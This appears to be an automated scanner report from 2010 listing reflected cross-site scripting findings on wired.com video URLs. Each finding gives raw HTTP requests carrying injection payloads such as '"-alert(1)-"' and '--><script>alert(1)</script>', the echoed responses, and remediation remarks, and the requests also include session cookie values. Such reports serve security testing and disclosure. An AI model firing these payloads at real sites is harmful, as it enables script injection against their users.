The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e93d3"><a>da689d17cc4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos/lateste93d3"><a>da689d17cc4/1815816633/disneys-cars-2-goes-international/677756918001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:42:10 GMT Date: Mon, 22 Nov 2010 00:37:10 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106774
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos c_lateste93d3"><a>da689d17cc4"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 40533"-alert(1)-"ada59dabe1a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest40533"-alert(1)-"ada59dabe1a/1815816633/disneys-cars-2-goes-international/677756918001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=275 Expires: Mon, 22 Nov 2010 00:42:37 GMT Date: Mon, 22 Nov 2010 00:38:02 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106781
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 353eb"-alert(1)-"5378680b007 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/1815816633353eb"-alert(1)-"5378680b007/disneys-cars-2-goes-international/677756918001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:43:17 GMT Date: Mon, 22 Nov 2010 00:38:17 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106780
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b25d5"-alert(1)-"54d4edc213d was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/1815816633/disneys-cars-2-goes-internationalb25d5"-alert(1)-"54d4edc213d/677756918001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:43:29 GMT Date: Mon, 22 Nov 2010 00:38:29 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106750
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload db679"-alert(1)-"571402115f6 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/1815816633/disneys-cars-2-goes-international/677756918001db679"-alert(1)-"571402115f6 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=274 Expires: Mon, 22 Nov 2010 00:43:15 GMT Date: Mon, 22 Nov 2010 00:38:41 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106750
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc300"><a>678c092b783 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /videocc300"><a>678c092b783/latest-videos/latest/1815816633/glab-galaxy-tab-windows-phone-7-boxee-box/673489628001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29436 Vary: Accept-Encoding Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:40:33 GMT Date: Mon, 22 Nov 2010 00:35:33 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_videocc300"><a>678c092b783 ss_latest-videos c_latest"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload 613d3--><script>alert(1)</script>43b9bab8598 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /video613d3--><script>alert(1)</script>43b9bab8598/latest-videos/latest/1815816633/glab-galaxy-tab-windows-phone-7-boxee-box/673489628001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29475 Vary: Accept-Encoding Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:41:32 GMT Date: Mon, 22 Nov 2010 00:36:32 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <!-- Exception message: URL not found: /video613d3--><script>alert(1)</script>43b9bab8598/latest-videos/latest/1815816633/glab-galaxy-tab-windows-phone-7-boxee-box/673489628001 --> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 28a9b"><a>c4d804fa51f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos28a9b"><a>c4d804fa51f/latest/1815816633/glab-galaxy-tab-windows-phone-7-boxee-box/673489628001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:41:38 GMT Date: Mon, 22 Nov 2010 00:36:38 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106802
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos28a9b"><a>c4d804fa51f c_latest"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 81130"-alert(1)-"2f35c747696 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos81130"-alert(1)-"2f35c747696/latest/1815816633/glab-galaxy-tab-windows-phone-7-boxee-box/673489628001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=284 Expires: Mon, 22 Nov 2010 00:42:21 GMT Date: Mon, 22 Nov 2010 00:37:37 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106789
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ddf32"><a>9773438e8ff was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos/latestddf32"><a>9773438e8ff/1815816633/glab-galaxy-tab-windows-phone-7-boxee-box/673489628001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:42:40 GMT Date: Mon, 22 Nov 2010 00:37:40 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106711
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos c_latestddf32"><a>9773438e8ff"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 88a4e"-alert(1)-"b2ff811f214 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest88a4e"-alert(1)-"b2ff811f214/1815816633/glab-galaxy-tab-windows-phone-7-boxee-box/673489628001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=285 Expires: Mon, 22 Nov 2010 00:43:36 GMT Date: Mon, 22 Nov 2010 00:38:51 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106786
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a57f0"-alert(1)-"a7d134a715c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/1815816633a57f0"-alert(1)-"a7d134a715c/glab-galaxy-tab-windows-phone-7-boxee-box/673489628001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:44:19 GMT Date: Mon, 22 Nov 2010 00:39:19 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106758
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 87ba6"-alert(1)-"0495acaed40 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/1815816633/glab-galaxy-tab-windows-phone-7-boxee-box87ba6"-alert(1)-"0495acaed40/673489628001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=280 Expires: Mon, 22 Nov 2010 00:44:07 GMT Date: Mon, 22 Nov 2010 00:39:27 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106788
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 64146"-alert(1)-"48511d6ee84 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/1815816633/glab-galaxy-tab-windows-phone-7-boxee-box/67348962800164146"-alert(1)-"48511d6ee84 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:44:34 GMT Date: Mon, 22 Nov 2010 00:39:34 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106697
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 1 is copied into an HTML comment. The payload 24bfa--><script>alert(1)</script>3c46c277be6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /video24bfa--><script>alert(1)</script>3c46c277be6/latest-videos/latest/1815816633/glab-microsoft-kinect-fall-test-skyfire/660653903001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29473 Vary: Accept-Encoding Cache-Control: max-age=286 Expires: Mon, 22 Nov 2010 00:45:15 GMT Date: Mon, 22 Nov 2010 00:40:29 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <!-- Exception message: URL not found: /video24bfa--><script>alert(1)</script>3c46c277be6/latest-videos/latest/1815816633/glab-microsoft-kinect-fall-test-skyfire/660653903001 --> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84273"><a>254c69cc0f7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video84273"><a>254c69cc0f7/latest-videos/latest/1815816633/glab-microsoft-kinect-fall-test-skyfire/660653903001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29434 Vary: Accept-Encoding Cache-Control: max-age=274 Expires: Mon, 22 Nov 2010 00:44:33 GMT Date: Mon, 22 Nov 2010 00:39:59 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_video84273"><a>254c69cc0f7 ss_latest-videos c_latest"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a13f"><a>8f3c503be2f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos2a13f"><a>8f3c503be2f/latest/1815816633/glab-microsoft-kinect-fall-test-skyfire/660653903001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=292 Expires: Mon, 22 Nov 2010 00:45:28 GMT Date: Mon, 22 Nov 2010 00:40:36 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106773
